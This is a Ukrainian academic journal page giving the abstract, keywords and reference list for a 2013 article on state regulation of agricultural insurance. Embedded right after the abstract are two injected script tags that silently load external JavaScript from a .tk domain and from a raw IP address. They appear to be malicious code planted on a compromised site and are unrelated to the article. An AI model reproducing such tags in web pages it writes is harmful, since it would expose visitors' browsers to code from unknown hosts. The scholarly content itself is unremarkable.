ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.342:631.16
Фінансові відносини та бухгалтерський облік

Механізм державного регулювання системи страхового захисту в аграрній сфері / // Економіка АПК. - 2013. - № 3 - С. 41

Розглянуто механізм державного регулювання системи страхового захисту в аграрній сфері, здійснено моніторинг існуючих проблем у світлі реалій сучасного економічного простору, а також визначено передумови та розроблено нові підходи й запропоновано заходи щодо їх розв’язання. Обґрунтовано, що страховий захист в аграрній сфері повинен спрямовуватися на виконання головних завдань щодо виробництва сільськогосподарської продукції, забезпечення господарств фінансовими ресурсами, натуральними запасами та матеріально-технічними засобами на всіх стадіях виробництва продукції, а також на відшкодування збитків унаслідок настання страхового випадку. Передусім необхідно закріпити державно-комерційний характер страхування, участь бюджету в його фінансуванні, порядок його наукового, технічного і кадрового забезпечення. При підтримці держави можливе і розширення сфери сільськогосподарського страхування за рахунок залучення в нього нових об’єктів, зокрема земель сільськогосподарського призначення. Бібліогр.: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: страховий захист, моніторинг, державне регулювання, страхові платежі, земельне страхування

Список використаних джерел

  1. Борисова В.А. Організаційно-економічний механізм страхування / В.А. Борисова, О.В. Огаренко – Суми: Вид-во “Довкілля”, 2001. – 194 с.
  2. Ботвіна Н.О. Проблеми розвитку страхового ринку України / Н.О. Ботвіна // Розвиток економіки України в умовах глобалізації: Всеукр. наук.-практ. конф. Зб. наук. робіт № 5 (102). – Харків, 2011. − С. 77-79.
  3. Гаманкова О.О. Ринок страхових послуг України, методологія, практика : [моногр.] / О.О. Гаманкова. – К. : КНЕУ, 2009. – 284 с.
  4. Гудзь О.Є. Територія екологічного агрострахування: можливості та нові горизонти / О.Є. Гудзь // Вісн. Сумського нац. аграр. ун-ту. Серія: Фінанси і кредит. – 2012. – № 1 (32). – С. 23 – 29.
  5. Князева Е.Г. Принципы и инновационные элементы страховой защиты предприятия / Е.Г. Князева // Фундамен-тальные исследования. – 2008. – № 2 – С. 127-128.
  6. Коваль О.А. Розвиток страхової діяльності в аграрному секторі економіки України / О.А. Коваль // АгроСвіт. – 2008. – №22. – С.38–41.
  7. Навроцький С.А. Соціально-економічні аспекти страхування АПК / С.А. Навроцький – Суми: Вид-во “Довкілля”, 2004. – 316 с
  8. Филонюк А.Ф. Страховая индустрия Украины: стратегия развития / А.Ф. Филонюк, А.Н. Залетив – К.: Международная агенция “Бизон”, 2008. – 448 с.
Читати статтю: 13_03_05.pdf